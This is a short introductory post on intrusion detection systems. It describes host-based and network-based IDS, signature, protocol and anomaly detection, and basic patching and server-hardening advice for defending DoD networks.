IDS-Intrusion Detection System and other Odds N Ends

IDS-Intrusion Detection System and other Odds N Ends

Intrusion Detection Systems (IDS) are an important part to keeping the DoD network systems protected. IDS is a tool to help identify when system defenses have failed and they monitor for suspicious and malicious activity which provides alerts when suspicious activities or anomalies occur. This allows for mitigation and to limit damage to information systems by identifying intrusions.

There many types of attacks which can affect information systems. Black Hats, Hactivists,
Script-Kiddies,crackers, client side attacks and server side attacks to name a few.

There are steps to preventing Server Side attacks which include proper DMZ design and firewalls
applying patches in a timely matter.

Server Hardening-Server Hardening is the process of enhancing server security through a variety of means which results in a much more secure server operating environment. With these types of steps Server-Side Attacks have been less frequent but still must be protected against.


Preventing Client Side

Frequent patches to all client software to include Windows, Microsoft Office, 3rd party software such as Flash, Adobe and alternate browsers. It is also important to keep anti-virus up to date to include the definitions database. A thorough scan should be preformed on a regular basis.

There are 2 types of IDS, Host based and Network based.

Host based IDS only monitors the host which the software is installed. This is helpful for monitoring the file system integrity, file permissions and it can log specific actions of each person who has logged onto the system. Host based IDS systems are used to monitor any intrusion attempts on critical servers. One of the drawbacks of Host Intrusion Detection Systems (HIDS) are difficult to analyze the intrusion attempts on multiple computers.

A Network based IDS run on the entire network and monitor the analyze the patterns and report any suspicious activity. Network IDS usually consists of network appliance (sensor) or the NIC card. The IDS is placed along a network segment or boundary and monitors all traffic on that segment.

There are 3 types of Network IDS.

Signature Based-which monitors and compares packets against pre-determined signatures or “attack patterns”;A signature-based system cannot detect attacks for which is has no signature


Protocol Based-which monitors the dynamic behavior and state of the protocol and will typically consist of a system or agent that would typically sit at the front end of a server, monitoring and analyzing the communication between a connected device and the system it is protecting.

Anomaly Based-a normal baseline is determined and set. Anything out of this “baseline” is considered an anomaly and therefore considers those as possible attacks. Higher false alarms are reported with using Anomaly Based IDS.

When using any type of IDS it is import to know the short comings of each type and be prepared to handle any threat. It's important to use HID along with NID to prevent penetration into a network. The two different type work hand in hand to protect the client, host, servers and inter network from malicious activity.